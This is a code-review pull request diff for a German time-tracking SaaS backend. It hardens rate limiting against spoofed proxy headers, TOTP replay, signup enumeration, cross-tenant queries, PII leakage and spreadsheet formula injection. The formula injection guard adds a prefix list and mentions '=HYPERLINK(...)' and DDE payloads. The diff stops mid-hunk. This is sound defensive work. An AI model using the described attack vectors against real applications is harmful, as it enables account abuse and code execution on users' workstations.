### PR TITLE
fix(review): HIGH+MEDIUM-Findings aus Intensiv-Review 2026-05-29

### DIFF
--- a/backend/alembic/versions/2026_05_29_0900-044_widen_audit_action.py
+++ b/backend/alembic/versions/2026_05_29_0900-044_widen_audit_action.py
@@ -1,0 +1,45 @@
+"""Widen time_entry_audit_logs.action from VARCHAR(20) to VARCHAR(40).
+
+The 20-char limit dated back to when only short actions existed
+(``create`` / ``update`` / ``delete``). Newer code paths emit
+``arbzg_superadmin_export`` (23 chars, superadmin §16 emergency export) and
+``license_readonly_mode_entered`` (29 chars, license read-only audit), both of
+which overflow varchar(20) → ``StringDataRightTruncation`` → 500 on the
+§16 export and a silently-dropped read-only audit row. SQLite (test DB) ignores
+varchar length, so CI never caught it. Widening to 40 mirrors migration 037
+(``source``) and leaves headroom for future markers.
+
+Revision ID: 044_widen_audit_action
+Revises: 043_break_waiver
+Create Date: 2026-05-29
+"""
+from alembic import op
+import sqlalchemy as sa
+
+
+revision = '044_widen_audit_action'
+down_revision = '043_break_waiver'
+branch_labels = None
+depends_on = None
+
+
+def upgrade() -> None:
+    op.alter_column(
+        'time_entry_audit_logs',
+        'action',
+        existing_type=sa.String(length=20),
+        type_=sa.String(length=40),
+        existing_nullable=False,
+        existing_server_default=None,
+    )
+
+
+def downgrade() -> None:
+    # Best-effort — will fail if any row already holds a >20-char value.
+    op.alter_column(
+        'time_entry_audit_logs',
+        'action',
+        existing_type=sa.String(length=40),
+        type_=sa.String(length=20),
+        existing_nullable=False,
+    )

--- a/backend/app/config.py
+++ b/backend/app/config.py
@@ -122,6 +122,14 @@ class Settings(BaseSettings):
     SERVE_FRONTEND: bool = False
     FRONTEND_DIR: str = "../frontend/dist"
 
+    # H2: whether to trust client-supplied X-Real-IP / X-Forwarded-For for
+    # rate-limiting. Only safe when a reverse proxy WE control (nginx/Caddy)
+    # sets these from the real socket. When the app is directly exposed
+    # (native mode) a client can spoof them to rotate rate-limit buckets and
+    # defeat the login limit. None = auto: trust only when NOT serving the
+    # frontend ourselves (i.e. behind a proxy). Override explicitly if needed.
+    TRUST_PROXY_HEADERS: Optional[bool] = None
+
     # License key file path (native installations only)
     LICENSE_KEY_PATH: Optional[str] = None
 
@@ -244,6 +252,16 @@ class Settings(BaseSettings):
         case_sensitive=True,
         extra="ignore"
     )
+
+    @property
+    def trust_proxy_headers(self) -> bool:
+        """H2: resolve whether client X-Real-IP / X-Forwarded-For may be trusted
+        for rate-limiting. Auto-default: trust only when a reverse proxy fronts
+        the app (i.e. we are NOT serving the frontend ourselves). Native mode
+        (SERVE_FRONTEND=True) is directly exposed → never trust client headers."""
+        if self.TRUST_PROXY_HEADERS is not None:
+            return self.TRUST_PROXY_HEADERS
+        return not self.SERVE_FRONTEND
 
 
 settings = Settings()

--- a/backend/app/core/limiter.py
+++ b/backend/app/core/limiter.py
@@ -10,15 +10,25 @@ def _get_real_ip(request: Request) -> str:
     over X-Forwarded-For, because X-Forwarded-For can be spoofed by clients and
     contains the nginx container IP when running behind Docker Compose — which would
     make all users share a single rate-limit bucket.
+
+    H2: client-supplied X-Real-IP / X-Forwarded-For are ONLY trusted when a
+    reverse proxy we control fronts the app (``settings.trust_proxy_headers``).
+    In native mode the app is directly exposed, so an attacker could otherwise
+    spoof these headers to get a fresh per-IP bucket on every request and defeat
+    the login rate limit — there we key on the real socket peer instead.
     """
-    real_ip = request.headers.get("X-Real-IP")
-    if real_ip:
-        return real_ip.strip()
-    # Fallback: first entry of X-Forwarded-For (may be spoofable without proper proxy config)
-    forwarded_for = request.headers.get("X-Forwarded-For")
-    if forwarded_for:
-        return forwarded_for.split(",")[0].strip()
-    # Last resort: direct connection IP
+    # Import here (not at module load) so tests can monkeypatch the setting.
+    from app.config import settings
+
+    if settings.trust_proxy_headers:
+        real_ip = request.headers.get("X-Real-IP")
+        if real_ip:
+            return real_ip.strip()
+        # Fallback: first entry of X-Forwarded-For (proxy-controlled here).
+        forwarded_for = request.headers.get("X-Forwarded-For")
+        if forwarded_for:
+            return forwarded_for.split(",")[0].strip()
+    # Native/direct (or no proxy header): trust only the real connection IP.
     return request.client.host if request.client else "unknown"
 
 

--- a/backend/app/main.py
+++ b/backend/app/main.py
@@ -419,8 +419,12 @@ app.add_middleware(GZipMiddleware, minimum_size=1024)
 # attached unconditionally — defence-in-depth against a missing/misconfigured
 # nginx `client_max_body_size` when running behind a reverse proxy.
 app.add_middleware(RequestSizeLimitMiddleware, max_size=2 * 1024 * 1024)  # 2MB
-if settings.SERVE_FRONTEND:
-    app.add_middleware(SecurityHeadersMiddleware)
+# M-SEC2: attach unconditionally (was gated on SERVE_FRONTEND). It only *sets*
+# response headers, so it is harmless behind nginx (which sets the identical
+# CSP) and provides a baseline CSP / anti-clickjacking guarantee if the reverse
+# proxy is ever misconfigured, replaced (e.g. Caddy), or bypassed. HSTS inside
+# the middleware is still gated on HTTPS.
+app.add_middleware(SecurityHeadersMiddleware)
 
 # Attach DB error logging handler (captures WARNING+ logs to error_logs table)
 # DSGVO F-007: sqlalchemy.engine intentionally NOT attached (SQL queries can contain PII)

--- a/backend/app/middleware/static_serving.py
+++ b/backend/app/middleware/static_serving.py
@@ -20,6 +20,12 @@ class SecurityHeadersMiddleware(BaseHTTPMiddleware):
         response.headers["X-Frame-Options"] = "SAMEORIGIN"
         response.headers["X-Content-Type-Options"] = "nosniff"
         response.headers["Referrer-Policy"] = "strict-origin-when-cross-origin"
+        # M-SEC3: style-src keeps 'unsafe-inline' deliberately — the React UI
+        # uses dynamic inline styles (style={{...}} for colours/widths) and two
+        # inline <style> keyframe blocks. Dropping it would break rendering;
+        # removing it requires migrating those to external CSS / nonces (tracked
+        # follow-up). The high-value directive script-src stays 'self'.
+        # Keep this policy byte-identical to frontend/nginx.conf.
         response.headers["Content-Security-Policy"] = (
             "default-src 'self'; "
             "script-src 'self'; "

--- a/backend/app/models/time_entry_audit_log.py
+++ b/backend/app/models/time_entry_audit_log.py
@@ -16,7 +16,10 @@ class TimeEntryAuditLog(Base):
     user_id = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=False, index=True)  # affected employee
     changed_by = Column(UUID(as_uuid=True), ForeignKey("users.id"), nullable=False, index=True)  # admin who made change
 
-    action = Column(String(20), nullable=False)  # "create", "update", "delete"
+    # Originally 20 chars (create/update/delete); widened to 40 in migration 044
+    # because arbzg_superadmin_export (23) and license_readonly_mode_entered (29)
+    # overflowed varchar(20) → StringDataRightTruncation → 500 on Postgres.
+    action = Column(String(40), nullable=False)  # "create", "update", "delete"
 
     # Old values (null for create)
     old_date = Column(Date, nullable=True)

--- a/backend/app/routers/admin_change_requests.py
+++ b/backend/app/routers/admin_change_requests.py
@@ -439,7 +439,7 @@ def review_change_request(
 
     # NOTE: ArbZG warnings are informational and calculated post-commit.
     # Hard limits (§3 daily max, §4 breaks) are enforced at CR creation time.
-    # SS6 Abs. 2 / SS14 ArbZG: Warnungen bei CREATE/UPDATE-Genehmigung
+    # §6 Abs. 2 / §3 ArbZG: Warnungen bei CREATE/UPDATE-Genehmigung
     if (
         review.action == "approve"
         and cr.request_type in (ChangeRequestType.CREATE, ChangeRequestType.UPDATE)
@@ -468,7 +468,7 @@ def review_change_request(
                     "Verlängerung auf 10h nur mit 1-Monats-Ausgleich zulässig."
                 )
 
-            # SS14 ArbZG: Wochenarbeitszeit-Warnung (48h)
+            # §3 ArbZG: Wochenarbeitszeit-Warnung (48h)
             weekly = _calculate_weekly_net_hours(
                 db=db,
                 user_id=cr.user_id,

--- a/backend/app/routers/admin_time_entries.py
+++ b/backend/app/routers/admin_time_entries.py
@@ -15,6 +15,7 @@ from app.services.break_validation_service import validate_daily_break
 from app.routers.time_entries import (
     _calculate_daily_net_hours, _calculate_weekly_net_hours,
     MAX_DAILY_HOURS_HARD, MAX_DAILY_HOURS_WARN, MAX_NIGHT_WORKER_DAILY_WARN, MAX_WEEKLY_HOURS_WARN,
+    BREAK_WAIVER_SOURCE,
 )
 from app.services.arbzg_utils import is_night_work
 
@@ -40,15 +41,24 @@ def admin_create_time_entry(
         raise HTTPException(status_code=404, detail="Benutzer nicht gefunden")
 
     admin_create_warnings: list[str] = []
+    waiver_reason = (entry_data.break_waiver_reason or "").strip()
+    break_waiver_active = False
     if not user.exempt_from_arbzg:
-        # Break validation (SS4 ArbZG)
+        # Break validation (§4 ArbZG)
         break_error = validate_daily_break(
             db=db, user_id=user.id, entry_date=entry_data.date,
             start_time=entry_data.start_time, end_time=entry_data.end_time,
             break_minutes=entry_data.break_minutes,
         )
         if break_error:
-            raise HTTPException(status_code=400, detail=break_error)
+            # M-ARB3: parity with the employee path (#144) — a documented break
+            # waiver lets the admin record the §4 deviation instead of being
+            # hard-blocked. §3 (10h hard cap, below) is checked afterwards and
+            # is NOT waivable.
+            if not waiver_reason:
+                raise HTTPException(status_code=400, detail=break_error)
+            break_waiver_active = True
+            admin_create_warnings.append(f"BREAK_WAIVER: {break_error}")
 
         # SS3 ArbZG: daily hours hard limit
         daily_hours = _calculate_daily_net_hours(
@@ -66,7 +76,7 @@ def admin_create_time_entry(
         if daily_hours > MAX_DAILY_HOURS_WARN:
             admin_create_warnings.append(f"DAILY_HOURS_WARNING: Tagesarbeitszeit beträgt {daily_hours:.1f}h (>{MAX_DAILY_HOURS_WARN}h)")
 
-        # §14 ArbZG: Warnung bei Überschreitung der 48h-Wochengrenze
+        # §3 ArbZG: Warnung bei Überschreitung der 48h-Wochengrenze
         weekly_hours = _calculate_weekly_net_hours(
             db=db, user_id=user.id, entry_date=entry_data.date,
             start_time=entry_data.start_time, end_time=entry_data.end_time,
@@ -94,13 +104,15 @@ def admin_create_time_entry(
         end_time=entry_data.end_time,
         break_minutes=entry_data.break_minutes,
         note=entry_data.note,
+        break_waiver_reason=waiver_reason if break_waiver_active else None,
     )
     db.add(entry)
     db.flush()
 
     _create_audit_log(
         db, entry.id, user.id, current_user.id,
-        action="create", new_entry=entry, source="manual",
+        action="create", new_entry=entry,
+        source=BREAK_WAIVER_SOURCE if break_waiver_active else "manual",
         tenant_id=current_user.tenant_id,
     )
 
@@ -144,15 +156,23 @@ def admin_update_time_entry(
     update_break_minutes = entry_data.break_minutes if entry_data.break_minutes is not None else entry.break_minutes
 
     admin_update_warnings: list[str] = []
+    waiver_reason = (entry_data.break_waiver_reason or "").strip()
+    break_waiver_active = False
     if not affected_user or not affected_user.exempt_from_arbzg:
-        # Break validation (SS4 ArbZG)
+        # Break validation (§4 ArbZG)
         break_error = validate_daily_break(
             db=db, user_id=entry.user_id, entry_date=update_date,
             start_time=update_start_time, end_time=update_end_time,
             break_minutes=update_break_minutes, exclude_entry_id=entry.id,
         )
         if break_error:
-            raise HTTPException(status_code=400, detail=break_error)
+            # M-ARB3: parity with the employee path (#144) — documented waiver
+            # records the §4 deviation instead of a hard 400. §3 (below) stays
+            # a hard cap.
+            if not waiver_reason:
+                raise HTTPException(status_code=400, detail=break_error)
+            break_waiver_active = True
+            admin_update_warnings.append(f"BREAK_WAIVER: {break_error}")
 
         # SS3 ArbZG: daily hours hard limit
         daily_hours = _calculate_daily_net_hours(
@@ -170,7 +190,7 @@ def admin_update_time_entry(
         if daily_hours > MAX_DAILY_HOURS_WARN:
             admin_update_warnings.append(f"DAILY_HOURS_WARNING: Tagesarbeitszeit beträgt {daily_hours:.1f}h (>{MAX_DAILY_HOURS_WARN}h)")
 
-        # §14 ArbZG: Warnung bei Überschreitung der 48h-Wochengrenze
+        # §3 ArbZG: Warnung bei Überschreitung der 48h-Wochengrenze
         weekly_hours = _calculate_weekly_net_hours(
             db=db, user_id=entry.user_id, entry_date=update_date,
             start_time=update_start_time, end_time=update_end_time,
@@ -202,7 +222,7 @@ def admin_update_time_entry(
             "break_minutes": update_break_minutes,
             "note": entry_data.note if entry_data.note is not None else entry.note,
         },
-        source="manual",
+        source=BREAK_WAIVER_SOURCE if break_waiver_active else "manual",
         tenant_id=current_user.tenant_id,
     )
 
@@ -217,6 +237,9 @@ def admin_update_time_entry(
         entry.break_minutes = entry_data.break_minutes
     if entry_data.note is not None:
         entry.note = entry_data.note
+    # M-ARB3: persist the documented §4 break waiver when one was supplied.
+    if break_waiver_active:
+        entry.break_waiver_reason = waiver_reason
 
     db.commit()
     db.refresh(entry)
@@ -284,7 +307,11 @@ def list_audit_log(
     ``before`` cursor ASAP. Pass the ``created_at`` of the last row from
     the previous page as ``before`` to fetch the next older page.
     """
-    query = db.query(TimeEntryAuditLog)
+    # F-026: explicit tenant scoping on top of RLS — the audit log carries the
+    # most sensitive cross-tenant data (old/new note text, user ids).
+    query = db.query(TimeEntryAuditLog).filter(
+        TimeEntryAuditLog.tenant_id == current_user.tenant_id
+    )
 
     if user_id:
         query = query.filter(TimeEntryAuditLog.user_id == user_id)

--- a/backend/app/routers/admin_users.py
+++ b/backend/app/routers/admin_users.py
@@ -270,7 +270,13 @@ def get_user(user_id: str, db: Session = Depends(get_db), current_user: User = D
 @router.post("/users", response_model=UserCreateResponse, status_code=status.HTTP_201_CREATED)
 def create_user(user_data: UserCreate, db: Session = Depends(get_db), current_user: User = Depends(require_admin)):
     """Create a new user (admin only)."""
-    existing_user = db.query(User).filter(func.lower(User.username) == user_data.username.lower()).first()
+    # F-026: usernames are unique per (tenant_id, username) — scope the
+    # uniqueness probe to the caller's tenant so the same username can exist in
+    # different tenants, and so the check does not silently depend on RLS.
+    existing_user = db.query(User).filter(
+        func.lower(User.username) == user_data.username.lower(),
+        User.tenant_id == current_user.tenant_id,
+    ).first()
     if existing_user:
         raise HTTPException(status_code=400, detail="Benutzername bereits vergeben")
 

--- a/backend/app/routers/admin_vacations.py
+++ b/backend/app/routers/admin_vacations.py
@@ -53,7 +53,15 @@ def _enrich_vr_responses(vrs: list, db: Session) -> list[VacationRequestResponse
         if vr.last_modified_by:
             user_ids.add(vr.last_modified_by)
     user_ids.discard(None)
-    users = db.query(User).filter(User.id.in_(user_ids)).all() if user_ids else []
+    # F-026: scope referenced users to the tenants of the requests they belong to.
+    tenant_ids = {vr.tenant_id for vr in vrs}
+    users = (
+        db.query(User)
+        .filter(User.id.in_(user_ids), User.tenant_id.in_(tenant_ids))
+        .all()
+        if user_ids
+        else []
+    )
     user_map = {u.id: u for u in users}
 
     results = []
@@ -90,7 +98,10 @@ def list_all_vacation_requests(
     current_user: User = Depends(require_admin),
 ):
     """List all vacation requests (admin view)."""
-    query = db.query(VacationRequest)
+    # F-026: explicit tenant scoping on top of RLS.
+    query = db.query(VacationRequest).filter(
+        VacationRequest.tenant_id == current_user.tenant_id
+    )
     if request_status:
         query = query.filter(VacationRequest.status == request_status)
     if user_id:
@@ -181,7 +192,13 @@ def review_vacation_request(
 
     holidays = set()
     for year in years:
-        for h in db.query(PublicHoliday).filter(PublicHoliday.year == year).all():
+        # F-026 + CLAUDE.md PublicHoliday rule: standalone holiday queries must
+        # be tenant-scoped explicitly (RLS does not always cover them).
+        rows = db.query(PublicHoliday).filter(
+            PublicHoliday.year == year,
+            PublicHoliday.tenant_id == current_user.tenant_id,
+        ).all()
+        for h in rows:
             holidays.add(h.date)
 
     # Determine working days

--- a/backend/app/routers/auth.py
+++ b/backend/app/routers/auth.py
@@ -574,12 +574,19 @@ def totp_verify(
             detail="TOTP-Setup nicht initiiert. Bitte zuerst /totp/setup aufrufen."
         )
 
-    if not auth_service.verify_totp(current_user.totp_secret, verify_data.code):
+    # M-SEC4: use the replay-safe verifier (same as /login) and persist the
+    # accepted counter, so the code that activates 2FA cannot then be replayed
+    # against /login within the ±30s window.
+    accepted_counter = auth_service.verify_totp_with_counter(
+        current_user.totp_secret, verify_data.code, current_user.last_totp_counter
+    )
+    if accepted_counter is None:
         raise HTTPException(
             status_code=status.HTTP_400_BAD_REQUEST,
             detail="Ungültiger TOTP-Code. Bitte prüfen Sie Ihre Authenticator-App."
         )
 
+    current_user.last_totp_counter = accepted_counter
     current_user.totp_enabled = True
     db.commit()
     db.refresh(current_user)

--- a/backend/app/routers/public_signup.py
+++ b/backend/app/routers/public_signup.py
@@ -17,8 +17,10 @@ from app.schemas.signup import (
     SignupResponse,
     VerifyResponse,
 )
+import uuid
+
 from app.services import signup_service
-from app.services.mail_service import send_verification_email
+from app.services.mail_service import send_account_exists_email, send_verification_email
 
 
 router = APIRouter(prefix="/api/public", tags=["public-signup"])
@@ -86,6 +88,15 @@ def signup(
         accepted_terms=body.accept_terms,
         accepted_privacy=body.accept_privacy,
     )
+    if result.already_registered:
+        # M-API5: enumeration-safe. The response must be indistinguishable from
+        # a fresh signup (same 201 + same body shape). Notify the real owner
+        # out-of-band; return a non-identifying placeholder tenant_id.
+        try:
+            send_account_exists_email(to=body.admin_email)
+        except Exception:  # noqa: BLE001 — never block, never leak via exception/timing
+            pass
+        return SignupResponse(tenant_id=str(uuid.uuid4()))
     # S-M01: build the verification URL from the canonical SAAS_APP_URL, not
     # from the attacker-controllable Origin/Host header.
     verify_url = _verify_url(result.verification_token)
@@ -96,7 +107,7 @@ def signup(
     )
     try:
         from app.services.alerting import alert_new_signup
-        alert_new_signup(body.practice_name, body.admin_email)
+        alert_new_signup(body.practice_name)  # M-DSG2: no admin email to Slack
     except Exception:  # noqa: BLE001 — alerts never block signup
         pass
     return SignupResponse(tenant_id=str(result.tenant_id))

--- a/backend/app/routers/reports.py
+++ b/backend/app/routers/reports.py
@@ -11,6 +11,7 @@ from datetime import date
 from urllib.parse import quote
 from app.database import get_db
 from app.models import User, Absence, AbsenceType, TimeEntry, TimeEntryAuditLog
+from app.models.public_holiday import PublicHoliday
 from app.middleware.auth import require_admin
 from app.schemas.reports import EmployeeMonthlyReport, EmployeeYearlyAbsences
 from app.services import calculation_service, export_service, ods_export_service, rest_time_service
@@ -706,9 +707,15 @@ def get_24_week_averaging_period(
     §3 ArbZG: Daily hours may be extended to 10h only if the 8h daily average
     is maintained over 6 calendar months / 24 weeks.
 
-    For each active employee, sums all net working hours in the preceding 168
-    days and compares to the allowed budget (8h × scheduled work days).
-    `scheduled_work_days = 24 × user.work_days_per_week`.
+    For each active employee, sums all net working hours in the window and
+    compares to the allowed budget (8h × scheduled work days).
+
+    M-ARB2: ``scheduled_work_days`` is computed per actual working day in the
+    window — honouring the user's weekday schedule, historical working-hours
+    changes, public holidays and full-day absences — instead of a flat
+    ``24 × work_days_per_week``. A static denominator over- or under-states the
+    averaging budget when the contract changed mid-window or the window contains
+    holidays/absences, and could wrongly flag (or hide) a §3 violation.
 
     An employee flagged as non-compliant has systematically exceeded the 10h
     exception allowance and the ArbZG averaging clause no longer covers them.
@@ -721,6 +728,16 @@ def get_24_week_averaging_period(
 
     users = _get_active_visible_users(db, current_user.tenant_id)
     result = []
+
+    # Public holidays for the whole window, tenant-scoped (fetched once).
+    holiday_dates = {
+        h.date
+        for h in db.query(PublicHoliday).filter(
+            PublicHoliday.date >= start_date,
+            PublicHoliday.date <= end_date,
+            PublicHoliday.tenant_id == current_user.tenant_id,
+        ).all()
+    }
 
     for user in users:
         if user.exempt_from_arbzg:
@@ -738,8 +755,33 @@ def get_24_week_averaging_period(
         )
         total_hours = sum(float(e.net_hours or 0) for e in entries)
 
-        work_days_per_week = user.work_days_per_week or 5
-        scheduled_days = 24 * work_days_per_week
+        # Absences that mean the employee was NOT scheduled to work that day.
+        # Mirror get_monthly_target: TRAINING/SICK/OVERTIME keep the day
+        # scheduled (the employee was due to work); VACATION/OTHER/PAID_LEAVE
+        # remove it from the averaging denominator.
+        absence_dates = {
+            a.date
+            for a in db.query(Absence).filter(
+                Absence.user_id == user.id,
+                Absence.date >= start_date,
+                Absence.date <= end_date,
+                Absence.type.notin_([
+                    AbsenceType.TRAINING, AbsenceType.SICK, AbsenceType.OVERTIME,
+                ]),
+            ).all()
+        }
+
+        # Count actually-scheduled working days in the window (weekday schedule
+        # + contract history via get_*_for_date, minus holidays/absences).
+        scheduled_days = 0
+        d = start_date
+        while d <= end_date:
+            if d.weekday() < 5 and d not in holiday_dates and d not in absence_dates:
+                weekly_hours = calculation_service.get_weekly_hours_for_date(db, user, d)
+                if calculation_service.get_daily_target_for_date(user, d, weekly_hours) > 0:
+                    scheduled_days += 1
+            d += timedelta(days=1)
+
         max_budget = 8.0 * scheduled_days
         average = (total_hours / scheduled_days) if scheduled_days else 0.0
 

--- a/backend/app/routers/superadmin.py
+++ b/backend/app/routers/superadmin.py
@@ -194,7 +194,15 @@ def export_tenant_arbzg_data(
         tenant_id=tenant_id,
     )
     db.add(marker)
-    db.commit()
+    try:
+        db.commit()
+    except Exception as exc:  # noqa: BLE001
+        # The audit marker is a compliance nice-to-have; it must never abort
+        # the legally-mandated §16 export itself. Roll back the failed marker
+        # and still deliver the records.
+        db.rollback()
+        print(f"AUDIT WARN: Superadmin-ArbZG-Export-Marker konnte nicht "
+              f"persistiert werden (tenant={tenant_id}): {exc}")
 
     buffer = BytesIO(json.dumps(payload, ensure_ascii=False, indent=2).encode("utf-8"))
     filename = f"PraxisZeit_ArbZG-Export_{tenant.slug}_{datetime.now().strftime('%Y%m%d-%H%M%S')}.json"

--- a/backend/app/routers/time_entries.py
+++ b/backend/app/routers/time_entries.py
@@ -365,7 +365,28 @@ def clock_out(
             exclude_entry_id=open_entry.id,
         )
         if break_error:
-            clock_out_warnings.append(f"BREAK_WARNING: {break_error}")
+            # M-ARB1: if the employee supplied a break_waiver_reason, document the
+            # §4 deviation on the entry + audit trail (source='break_waiver'),
+            # mirroring the create/CR paths (#144). Clock-out stays non-blocking
+            # either way — without a reason it is a plain warning as before.
+            waiver_reason = (body.break_waiver_reason or "").strip()
+            if waiver_reason:
+                open_entry.break_waiver_reason = waiver_reason
+                _create_audit_log(
+                    db,
+                    open_entry.id,
+                    open_entry.user_id,
+                    current_user.id,
+                    action="update",
+                    new_entry=open_entry,
+                    source=BREAK_WAIVER_SOURCE,
+                    tenant_id=current_user.tenant_id,
+                )
+                db.commit()
+                db.refresh(open_entry)
+                clock_out_warnings.append(f"BREAK_WAIVER: {break_error}")
+            else:
+                clock_out_warnings.append(f"BREAK_WARNING: {break_error}")
     if not exempt:
         if daily_hours > MAX_DAILY_HOURS_WARN:
             clock_out_warnings.append("DAILY_HOURS_WARNING")

--- a/backend/app/schemas/time_entry.py
+++ b/backend/app/schemas/time_entry.py
@@ -89,6 +89,9 @@ class ClockInRequest(BaseModel):
 class ClockOutRequest(BaseModel):
     break_minutes: int = Field(default=0, ge=0)
     note: Optional[str] = None
+    # M-ARB1: document a §4 break deviation captured during clock-out, mirroring
+    # the create/CR paths (#144). Non-blocking — clock-out always succeeds.
+    break_waiver_reason: Optional[str] = Field(None, max_length=2000)
 
 
 class ClockStatusResponse(BaseModel):

--- a/backend/app/services/alerting.py
+++ b/backend/app/services/alerting.py
@@ -46,8 +46,11 @@ def alert(text: str, *, channel: Optional[str] = None) -> bool:
 
 # ───────────────── Convenience wrappers ─────────────────
 
-def alert_new_signup(tenant_name: str, admin_email: str) -> None:
-    alert(f":tada: Neuer Signup: *{tenant_name}* ({admin_email})")
+def alert_new_signup(tenant_name: str) -> None:
+    # M-DSG2: do NOT include the admin's email — Slack is an undisclosed
+    # sub-processor (not in the AVV/VVT/DSFA), so no data-subject PII may leave
+    # the instance. The practice name (business data) is sufficient signal.
+    alert(f":tada: Neuer Signup: *{tenant_name}*")
 
 
 def alert_plan_upgrade(tenant_name: str, new_plan: str) -> None:

--- a/backend/app/services/error_log_service.py
+++ b/backend/app/services/error_log_service.py
@@ -17,7 +17,6 @@ from app.database import set_superadmin_context
 # DSGVO F-007: Regex patterns for PII scrubbing
 _UUID_RE = re.compile(r'\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b', re.I)
 _EMAIL_RE = re.compile(r'\b[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}\b')
-_NAME_IN_PATH_RE = re.compile(r'(?<=/users/)[0-9a-f-]{36}')
 
 def _scrub_pii(text: str) -> str:
     """Replace UUIDs and email addresses in log messages with placeholders."""
@@ -26,6 +25,19 @@ def _scrub_pii(text: str) -> str:
     text = _UUID_RE.sub('<uuid>', text)
     text = _EMAIL_RE.sub('<email>', text)
     return text
+
+
+def _scrub_path(path: Optional[str]) -> Optional[str]:
+    """M-DSG4: strip resource UUIDs from request paths before they are stored.
+
+    Many paths embed a user/resource UUID (``/api/admin/users/<uuid>/journal``,
+    ``/api/absences/<uuid>``) — the pseudonymous identifier the scrubber removes
+    from message/traceback would otherwise persist verbatim in the ``path``
+    column. Replacing every UUID with ``<id>`` also improves dedup (the same
+    error on different ids aggregates to one fingerprint)."""
+    if not path:
+        return path
+    return _UUID_RE.sub('<id>', path)
 
 
 def _make_fingerprint(level: str, logger: str, message: str, path: Optional[str]) -> str:
@@ -51,6 +63,8 @@ def log_error(
     """
     # DSGVO F-007: scrub PII before storing
     message = _scrub_pii(message)
+    # M-DSG4: scrub UUIDs out of the path before it is stored AND fingerprinted.
+    path = _scrub_path(path)
     if traceback_str:
         traceback_str = _scrub_pii(traceback_str)
         # VULN-012: store only first 2000 chars to avoid leaking full stack frames

--- a/backend/app/services/export_service.py
+++ b/backend/app/services/export_service.py
@@ -15,6 +15,23 @@ from app.config import settings
 from sqlalchemy import extract
 
 
+# M-SEC1: spreadsheet formula / CSV injection guard. A cell whose text starts
+# with one of these characters is prefixed with an apostrophe so Excel /
+# LibreOffice treat it as literal text and never evaluate it as a formula.
+# Employee free-text (note, sunday_exception_reason) and user names flow into
+# the §16 export which an admin then opens — without this, a note like
+# ``=HYPERLINK(...)`` or a DDE payload would execute on their workstation.
+_FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")
+
+
+def neutralize_spreadsheet_formula(value):
+    """Return ``value`` with a leading apostrophe if it could be parsed as a
+    spreadsheet formula. Non-strings and safe strings are returned unchanged."""
+    if isinstance(value, str) and value and value[0] in _FORMULA_PREFIXES:
+        return "'" + value
+    return value
+
+
 def generate_monthly_report(db: Session, year: int, month: int, include_health_data: bool = False) -> BytesIO:
     """
     Generate Excel report for all employees for a given month.
@@ -68,7 +85,7 @@ def _create_employee_sheet(wb: Workbook, db: Session, user: User, year: int, mon
     # Row 1–2: ArbZG-relevante Mitarbeiter-Metadaten (§16 ArbZG Aufzeichnungspflicht)
     sheet.cell(row=1, column=1).value = "Mitarbeiter:"
     sheet.cell(row=1, column=1).font = Font(bold=True)
-    sheet.cell(row=1, column=2).value = f"{user.first_name} {user.last_name}"
+    sheet.cell(row=1, column=2).value = neutralize_spreadsheet_formula(f"{user.first_name} {user.last_name}")
     sheet.cell(row=1, column=4).value = "Wochenstunden:"
     sheet.cell(row=1, column=4).font = Font(bold=True)
     sheet.cell(row=1, column=5).value = float(user.weekly_hours)
@@ -181,7 +198,7 @@ def _create_employee_sheet(wb: Workbook, db: Session, user: User, year: int, mon
                 if e.note:
                     bemerkung_parts.append(e.note)
             if bemerkung_parts:
-                sheet.cell(row=row, column=10).value = " | ".join(bemerkung_parts)
+                sheet.cell(row=row, column=10).value = neutralize_spreadsheet_formula(" | ".join(bemerkung_parts))
             net = total_day_net
             total_net += net
         else:
@@ -242,7 +259,7 @@ def _create_employee_sheet(wb: Workbook, db: Session, user: User, year: int, mon
                 }
                 type_name = absence_type_map.get(absence.type.value, absence.type.value)
                 if absence.note:
-                    sheet.cell(row=row, column=10).value = absence.note
+                    sheet.cell(row=row, column=10).value = neutralize_spreadsheet_formula(absence.note)
             sheet.cell(row=row, column=9).value = f"{type_name} ({float(absence.hours)}h)"
         else:
             # Regulärer Arbeitstag
@@ -430,7 +447,7 @@ def _create_yearly_overview_sheet(wb: Workbook, db: Session, users: List[User], 
         sick_days = sick_hours / float(daily_target)
 
         # Write data
-        sheet.cell(row=row, column=1).value = f"{user.last_name}, {user.first_name}"
+        sheet.cell(row=row, column=1).value = neutralize_spreadsheet_formula(f"{user.last_name}, {user.first_name}")
         sheet.cell(row=row, column=2).value = float(user.weekly_hours)
         sheet.cell(row=row, column=3).value = float(yearly_target)
         sheet.cell(row=row, column=3).number_format = '0.00'
@@ -553,7 +570,7 @@ def _create_absences_overview_sheet(wb: Workbook, db: Session, users: List[User]
         total_days = vacation_days + (sick_days if include_health_data else 0) + training_days + overtime_comp_days + other_days + paid_leave_days
 
         # Write data
-        sheet.cell(row=row, column=1).value = f"{user.last_name}, {user.first_name}"
+        sheet.cell(row=row, column=1).value = neutralize_spreadsheet_formula(f"{user.last_name}, {user.first_name}")
         sheet.cell(row=row, column=2).value = vacation_days
         sheet.cell(row=row, column=2).number_format = '0.0'
         if include_health_data:
@@ -591,7 +608,7 @@ def _create_employee_yearly_sheet(wb: Workbook, db: Session, user: User, year: i
     sheet = wb.create_sheet(title=f"{user.last_name[:20]}")
 
     # Title
-    sheet.cell(row=1, column=1).value = f"{user.first_name} {user.last_name} - Jahresreport {year}"
+    sheet.cell(row=1, column=1).value = neutralize_spreadsheet_formula(f"{user.first_name} {user.last_name} - Jahresreport {year}")
     sheet.cell(row=1, column=1).font = Font(bold=True, size=14)
     sheet.merge_cells('A1:J1')
 
@@ -711,7 +728,7 @@ def _create_employee_yearly_sheet(wb: Workbook, db: Session, user: User, year: i
                 if e.note:
                     bemerkung_parts.append(e.note)
             if bemerkung_parts:
-                sheet.cell(row=row, column=10).value = " | ".join(bemerkung_parts)
+                sheet.cell(row=row, column=10).value = neutralize_spreadsheet_formula(" | ".join(bemerkung_parts))
             net = total_day_net
             total_net += net
         else:
@@ -767,7 +784,7 @@ def _create_employee_yearly_sheet(wb: Workbook, db: Session, user: User, year: i
                 }
                 type_name = absence_type_map.get(absence.type.value, absence.type.value)
                 if absence.note:
-                    sheet.cell(row=row, column=10).value = absence.note
